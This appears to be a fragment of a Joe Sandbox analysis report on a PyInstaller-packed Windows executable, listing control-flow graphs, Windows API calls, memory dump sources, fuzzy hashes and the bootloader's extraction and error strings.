                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF644871B6A), ref: 00007FF64487295E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                • Opcode ID: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
                                                                                                                                                                                                                                • Instruction ID: c8e74e29ab882016d0b012d010cee4df9487ba3c87560a8a27fd1fd941d9d4a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0816F71B0CA868DEB60FB1498D26B96390EF84785F444435DD8DC7B8EDE3DE5858740

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 409 7ff644871600-7ff644871611 410 7ff644871637-7ff644871651 call 7ff6448745c0 409->410 411 7ff644871613-7ff64487161c call 7ff644871050 409->411 418 7ff644871682-7ff64487169c call 7ff6448745c0 410->418 419 7ff644871653-7ff644871681 call 7ff644884f08 call 7ff644872910 410->419 416 7ff64487162e-7ff644871636 411->416 417 7ff64487161e-7ff644871629 call 7ff644872710 411->417 417->416 425 7ff6448716b8-7ff6448716cf call 7ff6448806d4 418->425 426 7ff64487169e-7ff6448716b3 call 7ff644872710 418->426 434 7ff6448716f9-7ff6448716fd 425->434 435 7ff6448716d1-7ff6448716f4 call 7ff644884f08 call 7ff644872910 425->435 433 7ff644871821-7ff644871824 call 7ff64488004c 426->433 441 7ff644871829-7ff64487183b 433->441 438 7ff644871717-7ff644871737 call 7ff644884f44 434->438 439 7ff6448716ff-7ff64487170b call 7ff644871210 434->439 447 7ff644871819-7ff64487181c call 7ff64488004c 435->447 448 7ff644871739-7ff64487175c call 7ff644884f08 call 7ff644872910 438->448 449 7ff644871761-7ff64487176c 438->449 446 7ff644871710-7ff644871712 439->446 446->447 447->433 463 7ff64487180f-7ff644871814 448->463 453 7ff644871802-7ff64487180a call 7ff644884f30 449->453 454 7ff644871772-7ff644871777 449->454 453->463 456 7ff644871780-7ff6448717a2 call 7ff64488039c 454->456 464 7ff6448717da-7ff6448717e6 call 7ff644884f08 456->464 465 7ff6448717a4-7ff6448717bc call 7ff644880adc 456->465 463->447 472 7ff6448717ed-7ff6448717f8 call 7ff644872910 464->472 470 7ff6448717c5-7ff6448717d8 call 7ff644884f08 465->470 471 7ff6448717be-7ff6448717c1 465->471 470->472 471->456 473 7ff6448717c3 471->473 476 7ff6448717fd 472->476 473->476 476->453
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                • Opcode ID: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
                                                                                                                                                                                                                                • Instruction ID: 635ceeb1053f39f318ee80f1db6a56b6941fd15b0c0ac8b1c02c80825c6da8db
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E519D21B0CA479AEA10BB61A8E35B96390BF84B94F544535EE0C87BDEEF3DE545D300

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF644873CBB), ref: 00007FF644878704
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF644873CBB), ref: 00007FF64487870A
                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00007FF644873CBB), ref: 00007FF64487874C
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878830: GetEnvironmentVariableW.KERNEL32(00007FF64487388E), ref: 00007FF644878867
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF644878889
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644888238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644888251
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872810: MessageBoxW.USER32 ref: 00007FF6448728EA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                • Instruction ID: 40fb5a91a1e8ec0f6027071174944447d2761233b90d69bca2c88638ece993cd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE416E21B1DA468CFA20F766A9E72B91291AF85BC0F804135ED0ED77DEEE3CE5018300

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 601 7ff644871210-7ff64487126d call 7ff64487bd80 604 7ff644871297-7ff6448712af call 7ff644884f44 601->604 605 7ff64487126f-7ff644871296 call 7ff644872710 601->605 610 7ff6448712d4-7ff6448712e4 call 7ff644884f44 604->610 611 7ff6448712b1-7ff6448712cf call 7ff644884f08 call 7ff644872910 604->611 617 7ff644871309-7ff64487131b 610->617 618 7ff6448712e6-7ff644871304 call 7ff644884f08 call 7ff644872910 610->618 624 7ff644871439-7ff64487144e call 7ff64487ba60 call 7ff644884f30 * 2 611->624 620 7ff644871320-7ff644871345 call 7ff64488039c 617->620 618->624 630 7ff64487134b-7ff644871355 call 7ff644880110 620->630 631 7ff644871431 620->631 638 7ff644871453-7ff64487146d 624->638 630->631 637 7ff64487135b-7ff644871367 630->637 631->624 639 7ff644871370-7ff644871398 call 7ff64487a1c0 637->639 642 7ff64487139a-7ff64487139d 639->642 643 7ff644871416-7ff64487142c call 7ff644872710 639->643 644 7ff644871411 642->644 645 7ff64487139f-7ff6448713a9 642->645 643->631 644->643 647 7ff6448713ab-7ff6448713b9 call 7ff644880adc 645->647 648 7ff6448713d4-7ff6448713d7 645->648 652 7ff6448713be-7ff6448713c1 647->652 650 7ff6448713ea-7ff6448713ef 648->650 651 7ff6448713d9-7ff6448713e7 call 7ff644899e30 648->651 650->639 654 7ff6448713f5-7ff6448713f8 650->654 651->650 655 7ff6448713c3-7ff6448713cd call 7ff644880110 652->655 656 7ff6448713cf-7ff6448713d2 652->656 658 7ff64487140c-7ff64487140f 654->658 659 7ff6448713fa-7ff6448713fd 654->659 655->650 655->656 656->643 658->631 659->643 661 7ff6448713ff-7ff644871407 659->661 661->620
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                • Instruction ID: de75c900769d35fff3529f518f4e3621aba89e85ccf8640be368e0b3e218b3a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B51A322B0C64289EA60BF15A8A23BA6291FF85B95F444135ED4DC7BDEEF3CE545C700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF64488F0AA,?,?,-00000018,00007FF64488AD53,?,?,?,00007FF64488AC4A,?,?,?,00007FF644885F3E), ref: 00007FF64488EE8C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF64488F0AA,?,?,-00000018,00007FF64488AD53,?,?,?,00007FF64488AC4A,?,?,?,00007FF644885F3E), ref: 00007FF64488EE98
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                • Instruction ID: 4861471d91912b6eac5c630d5e78980341220ec49ac5bb6e81186349b14b345c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8941CF61B1DA1289FA16FB16AC926752391FF49BA0F884539DD1DD778CEF3CE8498300

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF644873804), ref: 00007FF6448736E1
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF644873804), ref: 00007FF6448736EB
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872C50: MessageBoxW.USER32 ref: 00007FF644872D99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                • Instruction ID: 79b64d87b335e42266532746fd6705270bcfbca3dbfccebbacd77672012858d3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 402153A1B1CA4299FA20F724ECA73B66250BF98394F804136DE5DC65DDEF2DE504C701

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 746 7ff64488ba5c-7ff64488ba82 747 7ff64488ba84-7ff64488ba98 call 7ff644884ee8 call 7ff644884f08 746->747 748 7ff64488ba9d-7ff64488baa1 746->748 765 7ff64488be8e 747->765 750 7ff64488be77-7ff64488be83 call 7ff644884ee8 call 7ff644884f08 748->750 751 7ff64488baa7-7ff64488baae 748->751 768 7ff64488be89 call 7ff64488a8e0 750->768 751->750 753 7ff64488bab4-7ff64488bae2 751->753 753->750 756 7ff64488bae8-7ff64488baef 753->756 759 7ff64488baf1-7ff64488bb03 call 7ff644884ee8 call 7ff644884f08 756->759 760 7ff64488bb08-7ff64488bb0b 756->760 759->768 763 7ff64488bb11-7ff64488bb17 760->763 764 7ff64488be73-7ff64488be75 760->764 763->764 770 7ff64488bb1d-7ff64488bb20 763->770 769 7ff64488be91-7ff64488bea8 764->769 765->769 768->765 770->759 773 7ff64488bb22-7ff64488bb47 770->773 775 7ff64488bb49-7ff64488bb4b 773->775 776 7ff64488bb7a-7ff64488bb81 773->776 779 7ff64488bb72-7ff64488bb78 775->779 780 7ff64488bb4d-7ff64488bb54 775->780 777 7ff64488bb83-7ff64488bbab call 7ff64488d5fc call 7ff64488a948 * 2 776->777 778 7ff64488bb56-7ff64488bb6d call 7ff644884ee8 call 7ff644884f08 call 7ff64488a8e0 776->778 809 7ff64488bbc8-7ff64488bbf3 call 7ff64488c284 777->809 810 7ff64488bbad-7ff64488bbc3 call 7ff644884f08 call 7ff644884ee8 777->810 807 7ff64488bd00 778->807 781 7ff64488bbf8-7ff64488bc0f 779->781 780->778 780->779 784 7ff64488bc11-7ff64488bc19 781->784 785 7ff64488bc8a-7ff64488bc94 call 7ff64489391c 781->785 784->785 788 7ff64488bc1b-7ff64488bc1d 784->788 798 7ff64488bd1e 785->798 799 7ff64488bc9a-7ff64488bcaf 785->799 788->785 792 7ff64488bc1f-7ff64488bc35 788->792 792->785 796 7ff64488bc37-7ff64488bc43 792->796 796->785 801 7ff64488bc45-7ff64488bc47 796->801 803 7ff64488bd23-7ff64488bd43 ReadFile 798->803 799->798 804 7ff64488bcb1-7ff64488bcc3 GetConsoleMode 799->804 801->785 808 7ff64488bc49-7ff64488bc61 801->808 811 7ff64488bd49-7ff64488bd51 803->811 812 7ff64488be3d-7ff64488be46 GetLastError 803->812 804->798 806 7ff64488bcc5-7ff64488bccd 804->806 806->803 813 7ff64488bccf-7ff64488bcf1 ReadConsoleW 806->813 816 7ff64488bd03-7ff64488bd0d call 7ff64488a948 807->816 808->785 817 7ff64488bc63-7ff64488bc6f 808->817 809->781 810->807 811->812 819 7ff64488bd57 811->819 814 7ff64488be63-7ff64488be66 812->814 815 7ff64488be48-7ff64488be5e call 7ff644884f08 call 7ff644884ee8 812->815 822 7ff64488bd12-7ff64488bd1c 813->822 823 7ff64488bcf3 GetLastError 813->823 827 7ff64488bcf9-7ff64488bcfb call 7ff644884e7c 814->827 828 7ff64488be6c-7ff64488be6e 814->828 815->807 816->769 817->785 826 7ff64488bc71-7ff64488bc73 817->826 830 7ff64488bd5e-7ff64488bd73 819->830 822->830 823->827 826->785 834 7ff64488bc75-7ff64488bc85 826->834 827->807 828->816 830->816 836 7ff64488bd75-7ff64488bd80 830->836 834->785 837 7ff64488bd82-7ff64488bd9b call 7ff64488b674 836->837 838 7ff64488bda7-7ff64488bdaf 836->838 846 7ff64488bda0-7ff64488bda2 837->846 842 7ff64488bdb1-7ff64488bdc3 838->842 843 7ff64488be2b-7ff64488be38 call 7ff64488b4b4 838->843 847 7ff64488be1e-7ff64488be26 842->847 848 7ff64488bdc5 842->848 843->846 846->816 847->816 850 7ff64488bdca-7ff64488bdd1 848->850 851 7ff64488bdd3-7ff64488bdd7 850->851 852 7ff64488be0d-7ff64488be18 850->852 853 7ff64488bdf3 851->853 854 7ff64488bdd9-7ff64488bde0 851->854 852->847 856 7ff64488bdf9-7ff64488be09 853->856 854->853 855 7ff64488bde2-7ff64488bde6 854->855 855->853 857 7ff64488bde8-7ff64488bdf1 855->857 856->850 858 7ff64488be0b 856->858 857->856 858->847
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                • Instruction ID: fc3e10131e72d4b54e171f405471ba1110d25cf7302ebdd2061e1b2bde9458ab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19C1DF22A0CA869AE660BB1594C22BD7B91FFC1B90F554131FE4E8779ADF7CE845C700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                • Instruction ID: 8ff23daac34e28f961cb8ae23d9edeb7e9f529dbe03ddca6641a9341b4c75295
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19215131B0CA4696EA10BB55B9D622AA3A0FFC57A0F500635EE6D83AECDE7DD4458700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: GetCurrentProcess.KERNEL32 ref: 00007FF644878590
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: OpenProcessToken.ADVAPI32 ref: 00007FF6448785A3
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: GetTokenInformation.KERNELBASE ref: 00007FF6448785C8
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: GetLastError.KERNEL32 ref: 00007FF6448785D2
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: GetTokenInformation.KERNELBASE ref: 00007FF644878612
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64487862E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878570: CloseHandle.KERNEL32 ref: 00007FF644878646
                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF644873C55), ref: 00007FF64487916C
                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF644873C55), ref: 00007FF644879175
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                • Instruction ID: bce3d37799d3d9e335fbfa39cce7c57ba69659e3440c3ac35b5d8b626efc252f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF215E21B0CB4289F610BB10E9A62EA62A5FF88780F444035EE4D83B9EDF3DD845C750

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
